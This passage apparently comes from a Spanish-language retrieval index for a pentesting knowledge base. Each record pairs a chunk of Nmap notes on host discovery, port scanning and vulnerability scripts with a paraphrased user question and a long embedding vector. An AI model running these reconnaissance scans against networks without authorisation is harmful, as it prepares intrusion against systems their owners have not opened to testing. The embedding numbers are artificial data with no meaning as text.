Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quiΓ©n estΓ‘ vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el mΓ‘s fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "indexar": "cual es un programa para ver quΓ© dispositivos estΓ‘n conectados a mi red?", "v": [0.00506, 0.22176, -0.06236, -0.12149, 0.0645, -0.00745, -0.10253, -0.03662, -0.0051, -0.10167, -0.13533, -0.17462, -0.11899, -0.07125, 0.12716, -0.01837, 0.01209, -0.0179, 0.14075, -0.06065, -0.00881, -0.00126, -0.04449, -0.0301, 0.04765, 0.11821, 0.17238, 0.0702, -0.10319, -0.04078, 0.0544, -0.07271, 0.04767, 0.03135, -0.05314, 0.03966, 0.08617, 0.1521, -0.019, 0.0501, -0.07266, 0.00734, -0.01684, -0.06445, 0.15537, -0.05211, 0.06683, -0.09971, 0.0036, 0.0344, -0.13836, 0.11184, -0.0902, -0.00684, -0.03982, -0.12549, 0.09029, -0.07525, 0.02221, 0.01305, -0.08421, -0.06207, -0.06164, 0.03559, 0.05811, -0.04735, 0.01235, 0.09222, -0.06352, 0.02635, 0.08084, 0.06128, -0.06438, -0.02224, 0.02324, 0.17513, 0.03832, -0.05178, 0.07478, -0.02636, 0.06128, 0.02213, 0.03565, 0.0223, -0.03831, -0.01843, 0.02266, 0.0227, -0.05316, -0.05326, 0.06234, -0.00294, 0.02375, -0.00456, 0.05791, -0.05144, 0.12109, 0.0165, 0.02953, 0.08307, 0.00952, 0.06132, -0.142, 0.07314, -0.10512, -0.01426, 0.03195, 0.00556, 0.04305, 0.08062, 0.05784, -0.08033, 0.04292, -0.03829, -0.01105, -0.00958, -0.02065, -0.04372, 0.00498, -0.09298, -0.0626, -0.00174, 0.00733, -0.01553, 0.12575, 0.03246, -0.04223, 0.02193, -0.01463, 0.05497, 0.05622, -0.05834, 0.00153, -0.13473, -0.11198, -0.06616, -0.05706, -0.07564, 0.02949, 0.02857, -0.00945, 0.04483, -0.02169, -0.08197, 0.01382, 0.01632, 0.05842, -0.01016, -0.02246, 0.06397, -0.0453, 0.04531, -0.09721, 0.0309, -0.00211, 0.10433, 0.00647, -0.02193, -0.07893, 0.01214, -0.07781, -0.06951, -0.00986, -0.03995, -0.01727, -0.04192, 0.03167, 0.08795, 0.1548, 0.03661, -0.07042, 0.08741, 0.01527, -0.06788, 0.00805, -0.05034, 0.03774, -0.08358, 0.03265, -0.07063, -0.02404, 0.02661, 0.05445, -0.02257, -0.0296, 0.0007, -0.03479, 0.01663, 0.02168, 0.01092, -0.00908, -0.01355, 0.00463, 0.05197, 0.1179, -0.02712, -0.02582, -0.00971, -0.0016, -0.01956, -0.03065, -0.00808, 0.02562, 0.01937, 0.03615, 0.07187, 0.03996, -0.02946, 0.02402, 0.05132, 0.02633, -0.01183, 0.05022, -0.02075, -0.03558, -0.03351, 0.00284, -0.01211, 0.07534, -0.02031, 0.07379, -0.04155, 0.01612, 0.01908, 0.0053, -0.0088, -0.03253, 0.03419, -0.01541, -0.0524, -0.01191, -0.09094, -0.00591, 0.00682, -0.02982, -0.01978, -0.00236, -0.00445, -0.04601, -0.02366, -0.02174, 0.12422, -0.02376, -0.04156, -0.03443, 0.00254, -0.11136, -0.0234, -0.01388, -0.04593, -0.06124, 0.04967, 0.06372, -0.04883, 0.02928, 0.07185]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quiΓ©n estΓ‘ vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el mΓ‘s fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "indexar": "que herramienta sirve para encontrar todos los ordenadores vivos en la red sin hacer ping?", "v": [0.08215, -0.04426, -0.20364, -0.10499, 0.09934, -0.13894, -0.12828, -0.11467, 0.09636, -0.18916, 0.08979, -0.12056, 0.01056, -0.09223, 0.19074, 0.0173, 0.02629, -0.05882, 0.10549, 0.00143, -0.09089, 0.05896, -0.1164, 0.01188, 0.05906, 0.08119, 0.07178, -0.02272, -0.13752, 0.11632, -0.0013, 0.06883, 0.02407, -0.04278, -0.1372, 0.00309, 0.011, 0.02958, -0.02183, 0.10998, -0.06422, 0.0774, -0.00688, 0.04093, -0.02795, -0.08112, 0.03407, -0.03168, 0.01255, 0.07951, -0.10271, -0.11863, -0.10256, -0.16856, -0.05328, -0.1536, 0.08229, -0.15244, 0.04449, -0.19207, -0.09162, 0.10903, 0.02898, -0.0568, 0.03957, 0.02838, 0.04545, -0.00276, 0.01927, 0.06561, -0.05327, 0.05504, 0.01409, -0.01627, 0.03403, 0.04686, 0.02261, -0.03473, 0.09746, 0.01234, 0.04344, -0.04998, -0.09406, -0.02117, 0.03461, -0.11089, 0.05344, -0.02247, 0.02593, -0.16247, 0.06041, 0.09576, 0.05214, 0.05132, 0.09085, 0.05056, 0.04002, -0.03542, 0.04933, 0.00203, 0.08716, -0.02867, -0.15898, 0.01908, -0.03671, 0.043, -0.00726, -0.04543, 0.02835, -0.01089, 0.11309, -0.01827, 0.03236, -0.03249, 0.02743, 0.07911, 0.02081, -0.00951, -0.02027, 0.00466, -0.02962, 0.01146, -0.00171, -0.04693, -0.0296, 0.03461, -0.00463, 0.03369, 0.05282, -0.02927, 0.07371, -0.03209, -0.0521, 0.00743, -0.02887, -0.024, 0.04298, -0.07919, -0.03873, -0.057, 0.03505, 0.07555, -0.07394, -0.14019, -0.05425, 0.09262, 0.00872, -0.02242, -0.05102, 0.02161, 0.02539, -0.02032, -0.01063, -0.00855, -0.00291, 0.04114, -0.02596, 0.05346, -0.05624, 0.03115, -0.02105, -0.02017, 0.05762, -0.00208, 0.02036, -0.0132, -0.01694, -0.01997, 0.05805, 0.01024, 0.00752, 0.00202, -0.01416, -0.10867, -0.03538, -0.03232, -0.0018, 0.00198, 0.04, -0.08147, 0.03289, 0.03492, -0.05845, -0.03022, -0.03202, -0.06018, 0.06138, 0.03649, -0.02745, -0.02986, 0.02625, 0.03637, -0.04141, 0.05686, 0.03645, 0.04898, 0.01069, -0.07642, 0.00682, -0.05559, -0.01779, -0.00272, -0.02973, -0.00097, 0.08588, 0.06101, -0.02972, 0.00079, 0.00142, 0.09475, -0.03814, 0.03357, 0.00555, 0.01971, -0.03327, -0.03533, 0.05402, -0.01672, 0.01283, -0.05654, 0.07479, -0.03427, -0.02087, 0.00587, -0.00536, -0.02867, 0.00423, -0.0152, 0.01843, -0.02667, -0.00267, -0.06423, 0.0382, 0.02069, -0.04488, -0.02273, 0.06807, 0.04085, -0.05168, -0.01901, -0.01962, 0.0317, -0.01813, -0.03656, 0.02982, -0.00609, -0.00095, -0.03868, 0.00026, -0.10261, -0.02278, -0.0544, 0.01537, -0.00253, 0.00708, 0.01006]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quiΓ©n estΓ‘ vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el mΓ‘s fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "indexar": "con que puedo detectar quΓ© puertos estΓ‘n abiertos si no llegan mis pings ICMP?", "v": [0.07777, 0.13234, -0.13543, -0.06539, 0.06194, -0.18322, 0.04986, 0.05277, -0.22004, -0.04702, 0.06799, 0.14316, 0.07433, -0.06075, 0.05421, 0.00576, -0.02608, 0.04817, 0.10332, -0.14721, -0.07984, 0.02342, -0.06785, -0.08857, 0.04719, 0.12494, -0.16997, 0.05909, -0.11144, -0.0711, -0.06815, -0.07185, 0.0425, 0.0427, -0.10505, -0.18077, -0.03415, 0.07106, 0.05962, 0.08728, 0.06914, 0.09662, -0.08492, -0.10536, 0.17582, -0.11777, -0.00941, -0.07283, 0.07697, -0.02591, -0.08837, 0.01204, -0.10408, 0.01153, -0.07159, 0.09371, -0.00556, 0.08096, 0.11728, -0.05714, -0.04356, 0.21979, -0.00152, -0.00919, 0.08954, -0.06793, -0.08218, 0.02487, 0.00591, -0.09786, -0.0714, -0.06399, 0.04271, 0.05685, 0.05194, 0.01774, -0.04629, -0.01607, 0.15111, 0.01191, 0.05389, 0.03956, -0.03868, 0.01636, 0.03305, -0.08112, -0.03754, -0.02264, 0.03762, -0.15515, 0.05783, 0.05838, 0.03474, 0.11215, -0.02187, 0.00403, -0.01377, -0.02786, -0.01736, 0.06101, 0.00237, 0.06519, -0.05942, 0.07813, 0.009, 0.02148, 0.04792, -0.05162, 0.08564, 0.00743, 0.01288, 0.03612, -0.02218, -0.03022, -0.00729, 0.03054, 0.0251, -0.06857, -0.04215, 0.03061, -0.02277, -0.06672, -0.06718, 0.04234, 0.01021, -0.05059, 0.01917, 0.01539, 0.05548, 0.01402, 0.05802, -0.08827, -0.08039, -0.09303, 0.00629, -0.05959, 0.00445, -0.07192, 0.00406, 0.00392, -0.06393, 0.0303, -0.04954, -0.03023, 0.0541, 0.0291, -0.05711, -0.02103, -0.08213, -0.04896, 0.01781, 0.06313, -0.02984, -0.00034, -0.04741, 0.04111, 0.07847, -0.02513, -0.04182, 0.02766, -0.03241, 0.03955, -0.06343, -0.00434, 0.08899, -0.0007, 0.018, 0.02369, 0.04747, 0.02876, -0.04824, 0.02119, -0.02601, -0.06175, 0.01175, -0.05077, -0.01513, -0.00771, 0.01771, -0.06948, -0.04008, 0.04243, -0.04508, -0.06545, -0.08221, -0.07192, 0.01077, -0.03753, 0.04727, 0.05231, 0.08521, -0.0177, -0.00812, 0.00399, 0.03238, -0.01501, 0.0155, -0.00533, -0.00511, -0.00481, 0.04317, 0.0016, 0.02164, 0.01191, 0.01121, -6e-05, -0.0472, 0.03556, 0.02602, 0.05625, 0.02527, 0.00607, 0.05913, -0.03807, -0.10032, 0.00321, -0.04731, 0.06775, -0.00374, 0.04903, 0.01338, 0.0368, 0.03027, 0.0106, 0.00744, -0.00301, -0.03152, 0.0169, 0.07748, 0.03721, 0.03449, 0.02126, -0.06448, -0.02849, -0.00121, -0.0368, -0.01001, 0.02324, -0.0145, -0.01359, 0.03856, 0.00814, 0.02212, -0.0902, 0.04852, -0.0499, -0.01029, 0.00636, 0.02485, -0.0463, -0.07401, 0.05172, 0.03715, -0.03159, 0.02751, 0.00146]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos β†’ Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versiΓ³n + scripts default β†’ Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "indexar": "ΒΏQuΓ© herramienta sirve para ver quΓ© puertos estΓ‘n abiertos en una red?", "v": [-0.01387, 0.10134, -0.07889, -0.04869, 0.10409, -0.102, 0.06072, -0.16345, 0.04672, -0.21085, -0.19052, -0.08123, 0.0488, -0.09847, 0.09626, 0.00302, 0.0038, -0.02259, 0.07841, 0.02541, -0.06252, -0.03332, -0.10508, -0.05726, -0.00749, 0.04218, 0.14655, -0.03881, -0.20096, 0.09166, -0.00943, 0.02943, 0.05899, -0.02955, -0.03951, -0.05712, 0.07039, 0.05945, 0.02702, 0.07603, 0.02872, 0.02399, -0.02658, -0.02591, 0.11462, -0.05853, -0.06243, -0.06054, 0.0144, 0.13708, -0.0748, -0.09182, -0.11287, -0.0237, 0.00401, -0.03596, 0.06978, -0.01977, 0.00794, -0.0743, -0.09365, 0.05084, -0.034, -0.05159, -0.03488, -0.15404, -0.06045, 0.05691, -0.04684, 0.06489, -0.07565, -0.02512, 0.00634, 0.10622, -0.0505, 0.01415, -0.02581, 0.0247, 0.03814, 0.03515, 0.12164, 0.08157, -0.05126, -0.0365, 0.01785, -0.10035, 0.00036, -0.00489, 0.00479, -0.15593, 0.0099, 0.05309, 0.03905, 0.10388, 0.002, -0.00317, -0.02185, -3e-05, -0.01401, 0.0206, 0.10752, -0.0204, -0.06437, -0.00874, -0.06318, 0.01602, -0.02478, -0.09573, -0.01033, 0.03861, 0.14922, -0.00916, 0.02752, 0.00916, 0.0123, 0.02825, -0.00504, -0.09287, -0.05098, -0.01204, 0.01664, -0.01156, -0.09411, -0.02844, -0.01526, -0.03765, -0.03708, 0.1056, 0.01126, -0.00225, 0.01233, -0.06758, -0.11265, -0.06985, -0.03197, -0.09319, 0.05557, -0.17653, -0.01816, -0.05814, -0.05551, 0.05162, -0.09131, -0.12188, -0.00464, 0.01999, 0.0547, -0.00299, -0.07438, -0.02083, 0.00979, -0.04644, -0.04336, 0.01922, -0.05064, 0.08054, 0.06145, -0.00785, -0.13178, 0.06669, -0.04161, -0.05966, -0.02656, -0.01374, 0.03997, -0.07169, 0.00612, 0.02979, 0.08269, 0.03565, 0.03582, 0.07834, -0.03755, -0.03881, -0.00217, -0.09779, -0.07235, -0.05137, -0.03659, -0.10682, -0.00639, 0.02082, -0.05455, -0.02224, -0.02043, -0.11683, 0.03705, -0.11441, 0.00035, 0.09347, -0.01002, -0.02642, 0.00894, -0.08254, 0.03107, 0.03262, 0.00282, -0.02126, 0.00268, -0.01924, 0.01285, -0.00209, 0.00927, -0.02966, 0.05012, 0.09515, -0.05998, 0.04318, -0.00636, 0.1157, -0.02407, 0.03236, 0.05414, 0.00162, -0.05137, 0.01168, -0.01698, 0.06327, 0.03021, 0.02201, 0.03042, 0.00578, -0.02185, 0.00836, 0.02108, 0.05658, 0.03907, -0.01476, 0.01914, 0.04969, 0.08073, -0.0317, -0.06303, -0.00562, -0.02705, -0.0478, 0.03526, 0.03209, -0.01004, -0.01522, 0.01484, 0.0268, -0.0031, -0.049, 0.04468, -0.05315, -0.00581, 0.01071, -0.01145, -0.07594, -0.09837, 0.03473, 0.00939, -0.04857, 0.02609, -0.01092]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos β†’ Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versiΓ³n + scripts default β†’ Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "indexar": "Con quΓ© puedo hacer un escaneo profundo de todos los puertos posibles?", "v": [-0.11899, 0.02006, -0.19586, 0.08913, 0.01742, -0.03574, 0.24449, -0.093, -0.18285, -0.11211, -0.01557, 0.18367, 0.04237, -0.07009, -0.07981, -0.01505, 0.08357, 0.07031, 0.04419, 0.06358, -0.0706, -0.09639, -0.08122, -0.04787, 0.12165, -0.00685, -0.05886, 0.10325, -0.07875, 0.03313, -0.10305, 0.15085, 0.12632, -0.00422, -0.01549, -0.02387, 0.06435, 0.02767, 0.08178, 0.03788, 0.03122, 0.01464, -0.09653, -0.09619, 0.08288, -0.13749, -0.10769, -0.12428, 0.01675, -0.04001, -0.08434, -0.03912, -0.09671, -0.03191, -0.01402, -0.06722, 0.05498, 0.03662, 0.06635, -0.1311, -0.06779, 0.07044, 0.01954, -0.0272, -0.04948, -0.03879, -0.00402, 0.10933, -0.02857, 0.06612, -0.14138, -0.03416, 0.06754, 0.06168, 0.02453, -0.04009, -0.00237, 0.03397, 0.02167, 0.02558, -0.01114, 0.0198, -0.05961, -0.11021, -0.07784, -0.02865, -0.08255, -0.0322, 0.01399, -0.11189, 0.05596, -0.09141, -0.00305, 0.11238, -0.02957, 0.03997, -0.01273, 0.03139, -0.04144, 0.03532, 0.0006, 0.01029, -0.10296, 0.08132, 0.00938, 0.04529, 0.00488, -0.05374, 0.06447, 0.03279, 0.05732, 0.06549, -0.07282, -0.09967, -0.05427, 0.00287, -0.01435, -0.07702, 0.00844, 0.07508, -0.00579, -0.10849, -0.01415, 0.00987, 0.00941, 0.02479, -0.04299, 0.09005, 0.04919, 0.03405, -0.03411, 0.01645, -0.09528, -0.04104, -0.01471, -0.05439, 0.03917, -0.11137, 0.00233, -0.03096, -0.08533, 0.09163, -0.06433, -0.03211, -0.04243, 0.04725, -0.00614, -0.01666, -0.05921, -0.04591, 0.0346, 0.07938, -0.07835, 0.04118, -0.03701, 0.04451, 0.10818, -0.03197, 0.02035, 0.04195, 0.02023, 0.008, -0.08107, -0.0073, 0.003, -0.06052, -0.08868, -0.0255, -0.05586, -0.01514, -0.05825, 0.09622, -0.03815, -0.05857, 0.01756, 0.00811, -0.03539, -0.05589, -0.01919, -0.01084, -0.03174, 0.07361, 0.02568, -0.03932, -0.01949, -0.06785, -0.01726, -0.08862, 0.00779, 0.06633, 0.01648, 0.04596, -0.06814, -0.01604, -0.02075, -0.00467, -0.01185, 0.00801, 0.00877, -0.04301, -0.02391, 0.02941, 0.04202, -0.03781, 0.01915, 0.00765, -0.11134, 0.01235, 0.01637, 0.09096, 0.00613, -0.0085, 0.04805, -0.01233, 0.01163, 0.03681, -0.03132, 0.05888, 0.02622, 0.08312, -0.03531, 0.03987, 0.00951, -0.01744, 0.0117, 0.05296, 0.05073, 0.01429, 0.04756, 0.04786, 0.07014, -0.013, -0.04588, -0.0883, -0.01578, 0.05198, -0.0253, -0.01331, -0.01299, -0.02292, 0.03389, -0.00195, -0.00087, 0.0127, 0.03471, -0.10018, -0.01135, 0.06049, -0.02237, -0.03735, -0.0275, 0.03441, 0.01074, -0.07031, 0.04833, -0.02196]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos β†’ Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versiΓ³n + scripts default β†’ Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "indexar": "ΒΏCuΓ‘l es la alternativa libre a un escaneador de puertos para detectar vulnerabilidades?", "v": [-0.04067, -0.06609, -0.12289, -0.10572, 0.0042, 0.00936, 0.04556, -0.16642, -0.10257, -0.06021, -0.05122, -0.04042, -0.10487, 0.01733, 0.05639, -0.03876, 0.03009, -0.0831, 0.14498, -0.00611, -0.0493, -0.075, -0.02705, -0.11544, 0.02256, -0.03382, -0.06571, 0.04102, -0.03649, -0.01102, -0.06145, -0.00198, 0.13799, 0.06456, -0.01238, 0.00129, 0.08918, -0.06974, 0.1832, 0.03764, 0.17617, 0.03171, -0.03378, -0.05926, 0.09664, -0.09396, -0.17902, -0.01459, 0.05308, 0.06548, -0.0694, 0.042, -0.14727, 0.03279, 0.02145, -0.00262, 0.09898, 0.02306, 0.10377, -0.14727, -0.0982, 0.12484, 0.0604, -0.04621, 0.02299, -0.06222, -0.08454, 0.04773, -0.14497, 0.06767, 0.02028, -0.06402, 0.01685, 0.08882, -0.07711, 0.01205, -0.00487, 0.03805, 0.04341, 0.07515, 0.08895, -0.00701, 0.0577, 0.03982, -0.08715, -0.0708, 0.0229, -0.07949, 0.08254, -0.08335, 0.12572, 0.01801, -0.00775, 0.15464, -0.02387, -0.0947, 0.05869, 0.06153, -0.07967, 0.05783, -0.00774, -0.02426, -0.01553, 0.10497, 0.01716, 0.01139, -0.03709, -0.01861, -0.01859, -0.05428, -0.00188, 0.05368, -0.00488, -0.04774, -0.09302, 0.03677, 0.01654, -0.02803, 0.0278, 0.05335, -0.05128, -0.11096, -0.07196, -0.06918, 0.03224, -0.01337, 0.04055, 0.04948, -0.0206, 0.0457, 0.06265, -0.06699, -0.05776, -0.1027, -0.14181, 0.03008, 0.06022, -0.1554, -0.05079, 0.04803, -0.05128, 0.05651, -0.01908, 0.03981, 0.04088, 0.04146, 0.0077, -0.0275, -0.09803, -0.00752, 0.00426, 0.02548, -0.11276, 0.06287, -0.06057, 0.03391, 0.07079, -0.04025, -0.08666, 0.10337, 0.0218, 0.02292, -0.02669, 0.00623, 0.02498, -0.02261, 0.06624, 0.00437, 0.00099, 0.02672, -0.00164, 0.13113, 0.01892, -0.1005, 0.04254, -0.02162, 0.01456, -0.08925, -0.02512, -0.05743, -0.02069, 0.03966, -0.06094, -0.06093, -1e-05, -0.04239, 0.01769, -0.05548, 0.03527, 0.1, 0.02879, -0.06654, -0.04194, -0.02927, 0.01671, 0.01773, 0.04728, -0.04256, -0.01063, -0.02098, -0.02929, -0.01703, 0.01396, -0.00122, 0.04532, 0.04868, -0.0658, 0.01222, 0.06728, 0.05953, 0.01445, 0.01962, 0.0893, -0.0382, -0.05947, 0.0043, -0.02841, 0.07794, 0.02357, -0.01281, -0.06158, 0.05282, 0.01584, 0.04329, -0.00612, -0.00276, -0.00691, 0.03608, 0.02425, 0.04542, 0.08821, -0.01915, -0.04859, -0.01327, -0.01974, -0.02515, -0.01006, 0.02589, 0.02542, 0.00055, 0.0698, 0.01648, 0.00686, -0.02181, 0.02226, -0.02985, -0.01884, 0.00336, -0.02626, -0.00751, -0.07062, 0.05404, 0.00682, -0.06377, 0.02899, -0.0284]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El combo de dos pasos (patrΓ³n real)\n```bash\nnmap -p- -Pn --min-rate 5000 -n --open IP # 1) rΓ‘pido: ΒΏquΓ© puertos abren?\nnmap -sCV -p 22,80,445 IP # 2) dirigido: versiΓ³n+scripts sobre esos\n```\n`-sCV` = `-sC` (scripts default) + `-sV` (versiΓ³n). Luego `searchsploit` por versiΓ³n β†’ searchsploit.", "indexar": "ΒΏQuΓ© herramienta sirve para escanear puertos abiertos de forma rΓ‘pida?", "v": [0.02007, -0.00177, -0.16783, -0.08805, 0.08075, -0.18107, 0.06317, -0.19581, -0.0045, -0.06273, -0.13224, 0.00888, 0.07101, -0.08217, 0.05242, 0.00376, 0.04634, -0.04781, 0.0278, 0.09106, -0.06606, 0.00319, -0.08921, -0.06406, -0.06633, -0.04327, 0.0412, 0.01887, -0.25078, 0.06338, -0.01607, 0.12094, 0.09866, 0.02481, -0.04345, -0.1232, 0.06521, -0.01853, 0.05682, 0.0618, 0.02191, -0.00879, -0.04585, -0.05375, 0.06151, -0.00982, -0.09706, 0.03253, 0.02937, 0.11792, -0.0361, -0.10577, -0.07707, 0.04043, -0.05677, -0.06061, 0.11967, -0.0451, 0.00387, -0.11084, -0.07049, 0.04777, -0.03183, -0.12152, -0.05407, -0.09819, -0.0169, 0.02061, -0.09098, 0.00409, -0.12135, -0.01057, 0.05621, 0.0794, -0.0561, -0.06473, -0.07394, 0.08383, 0.05328, 0.098, 0.13712, 0.00417, -0.06374, -0.08552, -0.00623, -0.02938, -0.03778, -0.01283, 0.02015, -0.09896, 0.00397, 0.0468, 0.02951, 0.15098, -0.03707, -0.03316, -0.03111, 0.05778, -0.0293, 0.01276, 0.10757, -0.0348, -0.10158, 0.05625, -0.06314, 0.00331, -0.05541, -0.08334, -0.07249, 0.06331, 0.13671, 0.05272, 0.00266, 0.00965, -0.02412, 0.04435, -0.02233, -0.10348, -0.05739, 0.00912, 0.04735, -0.05179, -0.07148, -0.02782, -0.02266, -0.02423, -0.00071, 0.06919, 0.02694, 0.00925, 0.041, -0.08708, -0.10806, -0.0183, -0.02919, -0.12031, 0.04117, -0.15596, 0.01164, -0.08399, -0.02796, 0.02561, -0.07214, -0.09748, -0.00681, -0.02424, 0.07328, -0.02338, -0.05318, -0.06046, 0.03135, -0.02104, -0.0792, 0.01633, -0.07669, -0.01307, 0.0652, -0.00701, -0.14131, 0.0792, -0.04527, -0.02387, 0.03161, -0.01305, 0.00678, -0.08974, 0.02583, 0.0146, 0.03536, 0.03693, 0.05205, 0.08912, -0.0149, -0.0577, 0.01549, -0.03044, -0.082, -0.02384, -0.04117, -0.06898, -0.02441, 0.03777, -0.06234, -0.02643, -0.03159, -0.08999, 0.06145, -0.09397, -0.0288, 0.10396, 0.02273, -0.00974, 0.01283, -0.11586, -0.01378, 0.00237, -0.00508, -0.01042, 0.00723, -0.01999, 0.01899, -0.02516, 0.00043, -0.05789, 0.02651, 0.08954, -0.05356, -0.02216, 0.02039, 0.06881, -0.03013, 0.00541, 0.06755, 0.00234, 0.01966, -0.01035, -0.0134, 0.05592, 0.01803, 0.01683, -0.04778, 0.01418, -0.00495, 0.02731, 0.02788, 0.04411, 0.03105, -0.00347, 0.00656, -0.00736, 0.06707, -0.02895, -0.04126, -0.04706, 0.00227, -0.064, 0.00731, -0.0196, -0.02054, 0.00117, 0.03186, 0.0003, 0.01225, 0.00586, -0.00135, -0.04057, 0.01895, -0.01129, -0.0342, -0.0488, -0.08293, 0.0213, 0.0033, -0.04439, 0.03133, -0.01244]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El combo de dos pasos (patrΓ³n real)\n```bash\nnmap -p- -Pn --min-rate 5000 -n --open IP # 1) rΓ‘pido: ΒΏquΓ© puertos abren?\nnmap -sCV -p 22,80,445 IP # 2) dirigido: versiΓ³n+scripts sobre esos\n```\n`-sCV` = `-sC` (scripts default) + `-sV` (versiΓ³n). Luego `searchsploit` por versiΓ³n β†’ searchsploit.", "indexar": "Con quΓ© puedo obtener la versiΓ³n y ejecutar scripts especΓ­ficos sobre los puertos encontrados?", "v": [0.12737, 0.14959, -0.08654, -0.09719, 0.07912, -0.17072, 0.1654, -0.1515, -0.03428, -0.13638, -0.11916, 0.03268, -0.00466, -0.0682, 0.05841, -0.00227, 0.05173, -0.06607, 0.02877, -0.03201, 0.01246, -0.15025, -0.04524, -0.04801, -0.06145, 0.01976, 0.03663, 0.0554, -0.09195, -0.02148, -0.03789, 0.11396, 0.01809, 0.00355, -0.06608, 0.006, -0.00625, 0.02611, 0.0127, 0.13078, 0.05648, 0.01434, -0.06889, 0.00352, 0.0613, -0.12567, 0.017, 0.01082, 0.00873, -0.09545, 0.06015, 0.09177, -0.14705, -0.02064, -0.08743, -0.0529, 0.01984, -0.01488, 0.0421, 0.02588, -0.06751, -0.00759, 0.04256, -0.05562, 0.0824, -0.00495, 0.02049, -0.03299, -0.04764, 0.02264, -0.0941, 0.03529, 0.00411, 0.08794, 0.05024, -0.03357, -0.09485, 0.00423, -0.01678, 0.04912, 0.03636, -0.08031, -0.00491, -0.06419, 0.00538, -0.15835, -0.21316, -0.09003, -0.0083, -0.14457, 0.12917, -0.09876, -0.04497, 0.07457, -0.08374, -0.04494, 0.06313, 0.00165, -0.00408, 0.07046, -0.07771, 0.00395, -0.05204, 0.1255, -0.05069, 0.05429, 0.04611, 0.00024, 0.04112, -0.0103, 0.06451, 0.00948, 0.01627, 0.00242, 0.01876, -0.01397, 0.01335, -0.07576, 0.05598, -0.03852, -0.10346, -0.01212, -0.07995, -0.03052, 0.01035, -0.04924, 0.00041, 0.09314, -0.02848, -0.03571, 0.01103, -0.04981, -0.08949, -0.13807, -0.0971, 0.09774, 0.1329, -0.01786, -0.06107, -0.07608, 0.02016, -0.02397, 0.04075, 0.03007, 0.04553, -0.03899, 0.01589, -0.02558, -0.01264, -0.05702, 0.05625, 0.00936, -0.0389, -0.00146, -0.04005, -0.04185, 0.03984, -0.00951, -0.05946, 0.04835, 0.02876, -0.00879, -0.18949, -0.00844, 0.0992, -0.01635, -0.1018, 0.07391, -0.00089, 0.0855, 0.01098, 0.09052, 0.00393, -0.10281, 0.00637, -0.02265, -0.03029, -0.06765, -0.04101, -0.03211, -0.04297, 0.01705, -0.01217, -0.0335, -0.08546, -0.13564, 0.03758, -0.04502, -0.04098, 0.08566, 0.03854, 0.05663, -0.02771, -0.0332, -0.03881, 0.00811, 0.00284, 0.03995, -0.02957, -0.05381, -0.02828, 0.03453, 0.03336, -0.0416, 0.05743, 0.05775, -0.06762, 0.05293, -0.02254, 0.01247, -0.00115, 0.02278, 0.03204, 0.01583, -0.05262, -0.02007, 0.02057, 0.04014, 0.08108, 0.03277, -0.01952, -0.00407, -0.01056, -0.03505, 0.00282, -0.02939, 0.04881, 0.03615, -0.0363, 0.1217, 0.01383, -0.00424, -0.07859, -0.02967, 0.00334, -0.00492, -0.06163, 0.00514, -0.03033, -0.02291, 0.01055, 0.01599, 0.04638, -0.07234, 0.03085, -0.04387, -0.01478, 0.00745, -0.01107, 0.02502, 0.00581, 0.03595, 0.00765, -0.05252, 0.01299, -0.02087]} +{"tipo": 